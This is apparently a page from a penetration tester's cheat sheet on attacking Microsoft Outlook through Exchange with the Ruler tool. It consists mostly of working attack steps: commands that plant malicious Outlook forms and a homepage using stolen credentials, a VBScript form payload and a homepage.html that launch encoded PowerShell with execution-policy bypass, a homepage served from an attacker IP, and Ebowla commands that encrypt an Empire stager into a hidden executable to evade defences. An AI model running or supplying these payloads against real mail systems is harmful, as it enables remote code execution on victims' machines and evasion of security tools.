Outlook

Display forms:
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form display
Exploit:
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form add --suffix test-form --input vbs-payload.txt --send
vbs-payload.txt:
CreateObject("WScript.Shell").Run "powershell -exec bypass -enc <BASE64_CMD>", 0, false
Cleanup:
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form delete --suffix test-form
Empire stager encryption:
$ grep -e output_type -e payload_type -e clean_output -e userdomain genetic.config
output_type = GO
payload_type = DLL_x64
clean_output = True
userdomain = 'MEGACORP'
$ python ebowla.py https443.dll genetic.config
$ ./build_x64_go.sh output/go_symmetric_https443.dll.go https443.exe --hidden

Exploit:
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug homepage add --url http://10.10.13.37/homepage.html
homepage.html:
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
Sub window_onload()
Set Application = ViewCtl1.OutlookApplication
Set cmd = Application.CreateObject("Wscript.Shell")
cmd.Run("powershell -exec bypass -e <BASE64_CMD>")
End Sub
-->
</script>
</head>
<body>
<object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"></object>
</body>
</html>
Cleanup:
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug homepage delete
Stager encryption is the same as for Ruler/Forms.
Last modified 10mo ago
Copy link
On this page
Ruler
Rules
Forms
Homepage